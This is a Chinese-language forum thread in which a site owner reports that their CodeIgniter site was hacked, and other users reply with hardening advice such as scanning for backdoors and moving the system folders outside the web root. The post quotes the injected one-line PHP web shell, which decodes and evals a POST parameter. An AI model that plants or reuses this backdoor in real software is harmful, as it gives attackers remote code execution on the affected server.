急!急,我的网站被别人攻击了,是否CI有漏洞?求大神出招
我的网站被别人攻击了,是否CI有漏洞?Notice: Undefined index: nd335c3 in D:\AppServ\www\system\codeigniter\CodeIgniter.php on line 1
A PHP Error was encountered
Severity: Warning
Message: Cannot modify header information - headers already sent by (output started at D:\AppServ\www\system\codeigniter\CodeIgniter.php:1)
在每个文件中都加入了类似如下的代码
<?php
eval(base64_decode($_POST['nd335c3']));
?>
基本上把系统文件都加入了,该如何处理?
给的信息太少判断不出来。
应该不是,估计是服务器权限设置不好。
扫一下目录看是否有后门文件,环境下有其它程序的话也应该扫一下。
可以把CI的system文件夹和application文件夹放在访问目录的父目录。做好访问权限设置。
-app
-sys
-web/index.php 入口文件。
win系操作系统,权限设置好的话也是很安全的。 这样的一句话攻击很容易解决的。
页:
[1]